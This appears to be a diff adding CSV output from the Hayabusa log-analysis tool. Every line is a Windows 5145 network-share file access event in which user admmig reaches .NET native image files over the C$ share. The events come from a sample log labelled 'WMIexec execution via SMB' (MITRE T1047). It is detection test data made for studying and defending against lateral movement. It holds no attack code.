+2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\89e812888a4e94f1d2bf0da1c4c6ee5b  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P655586bb#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P655586bb#\f3228ac51b37737ae2ce1176bbbad2ce  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P39041136#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P39041136#\cabc62ca2a04f99fe9af65799a727687  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\1617c5f47d154a5d7cf1f53851398006  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\19b334bb62b3c76cfcc7137bb03371c3  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pcd26229b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pcd26229b#\822ee6a8aa9386352052b7bd2610f3b5  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pd3efef62#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pd3efef62#\ab00f4aa6892c4c6d39b87f078e8208f  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pefb7a36b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pefb7a36b#\93b57911ae369118b40a5605c448eb9d  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.R251a4777#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.R251a4777#\b090c87f42b1af785a6a9d1c43c201c6  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S0f8e494c#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S0f8e494c#\c59f97903ad4de423586f3a75eb8939d  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S1bc92e04#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S1bc92e04#\f6f9e39cc765b7ceda89fc7893e0f74c  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S8ca2c749#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S8ca2c749#\7ddbc8b883fb594b4efd9f4b016a4657  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S54faafb0#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S54faafb0#\54486a01e573ae88df2c9fc21771e5ef  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S356e1ba0#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S356e1ba0#\29e4fb69d6e2ff119c3e89fe9f23ea71  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S88747207#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S88747207#\e998cb40c6a3657a6090a653616ee0d2  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sa56e3556#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sa56e3556#\2da102d7caf13b4e082aabda839cabfd  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sb6a1f1bc#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sb6a1f1bc#\05a925477e72821ff9fa9527061d8527  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.T9d753d8c#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.T9d753d8c#\9543db50e278526c3ba397cf5c7862cb  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te49ad7d9#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te49ad7d9#\1834f24e507a831c635b80067fc7a428  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te3736ca4#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te3736ca4#\f98240dfe778b4b39045d17817485b8a  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ud0e65fb9#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ud0e65fb9#\bb434af0d1c0846eba8f3fc7986a5cdc  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\b59fee046dfa048ec5f5180dc88f835d  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V4381984f#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V4381984f#\07b01287acdaf4ef356c3918db535afd  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vb0a86591#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vb0a86591#\a45750f13b28bdd0fb2adff38d6cd46f  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vf4833439#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vf4833439#\fdcc95e5c05a2fec4f9c33b7e325ccd8  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.VisualC  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.VisualC\999abcb4ea322b606c8f211d12ccb5a0  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W0bb5dac4#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W0bb5dac4#\f5bca9052007da4e51412dc152a52942  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2bac6884#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2bac6884#\26a1a0abca839c13b1337a076531d7a2  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d29a719#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
